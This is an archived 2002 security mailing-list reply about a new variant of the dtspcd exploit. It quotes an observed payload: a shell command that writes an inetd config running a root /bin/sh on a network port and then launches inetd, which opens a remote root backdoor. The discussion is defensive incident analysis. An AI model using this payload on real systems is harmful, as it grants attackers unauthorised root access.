Re: variation of the dtspcd exploit?

From: Valdis.Kletnieksat_private
Date: Thu Feb 14 2002 - 19:00:19 PST

Next message: Tina Bird: "IDS signatures for PROTOS SNMP tests"

Previous message: Dave Dittrich: "Re: Port 80 SYN flood-like behavior"
In reply to: Nathan W. Labadie: "variation of the dtspcd exploit?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Thu, 14 Feb 2002 16:07:10 EST, "Nathan W. Labadie" <ab0781at_private>  said:
> Until last week, all the dtspcd exploits I'd seen had been the same
> (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
> around.  The ASCII output looks something like this:
> 
> /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
> /usr/sbin/inetd -s /tmp/z;
> sleep 10;

Hmm... hardly new.  Somebody's retrofitted a /tmp/bob onto a new delivery
vector, it looks like (though I've not check the capture)...
-- 
				Valdis Kletnieks
				Computer Systems Senior Engineer
				Virginia Tech

application/pgp-signature attachment: stored

Next message: Tina Bird: "IDS signatures for PROTOS SNMP tests"
Previous message: Dave Dittrich: "Re: Port 80 SYN flood-like behavior"
In reply to: Nathan W. Labadie: "variation of the dtspcd exploit?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Feb 15 2002 - 08:28:34 PST